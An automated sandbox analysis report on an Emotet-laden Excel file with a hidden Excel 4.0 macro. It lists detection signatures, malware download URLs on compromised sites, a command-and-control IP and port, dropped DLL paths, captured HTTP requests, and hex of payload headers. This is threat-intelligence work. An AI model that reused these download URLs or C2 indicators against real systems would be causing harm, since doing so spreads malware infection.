Windows Analysis Report
Datei_26744565.xls

Overview

General Information

Sample Name: Datei_26744565.xls
Analysis ID: 632101
MD5: a8777e5596125dadbb7563052324e1bb
SHA1: bbd66379044f8d49541a7ae6d793b44a0aea3b49
SHA256: cbd5b0454385324baee6fc97124c8656ea55f4272f7365e2fbcf570470cba4e6
Tags: xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Datei_26744565.xls ReversingLabs: Detection: 39%
Antivirus detection for URL or domain
Source: http://learnviaonline.com/wp-admin/qGb/ Avira URL Cloud: Label: malware
Source: http://milanstaffing.com/images/D4TRnDubF/ Avira URL Cloud: Label: malware
Source: http://kolejleri.com/wp-admin/REvup/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: kolejleri.com Virustotal: Detection: 11% Perma Link
Source: milanstaffing.com Virustotal: Detection: 6% Perma Link
Source: learnviaonline.com Virustotal: Detection: 8% Perma Link
Source: stainedglassexpress.com Virustotal: Detection: 5% Perma Link
Source: http://learnviaonline.com/wp-admin/qGb/ Virustotal: Detection: 14% Perma Link
Source: http://milanstaffing.com/images/D4TRnDubF/ Virustotal: Detection: 13% Perma Link
Source: http://kolejleri.com/wp-admin/REvup/ Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr1.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr2.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr3.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr4.ocx Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\uxevr4.ocx ReversingLabs: Detection: 60%
Source: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) Metadefender: Detection: 28% Perma Link
Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) ReversingLabs: Detection: 60%
Source: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy) ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr3.ocx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr1.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr4.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr2.ocx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 6_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 8_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 10_2_000000018000BEF0

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Jf8[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: learnviaonline.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.171.181.223 103.171.181.223
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:03 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:03 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:10 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:10 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikk
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:50:16 GMTexpires: Mon, 23 May 2022 07:50:16 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:50:16 GMTserver: LiteSpeedvary: User-AgentData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 165.22.73.229:8080
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.com
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.1215037206.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
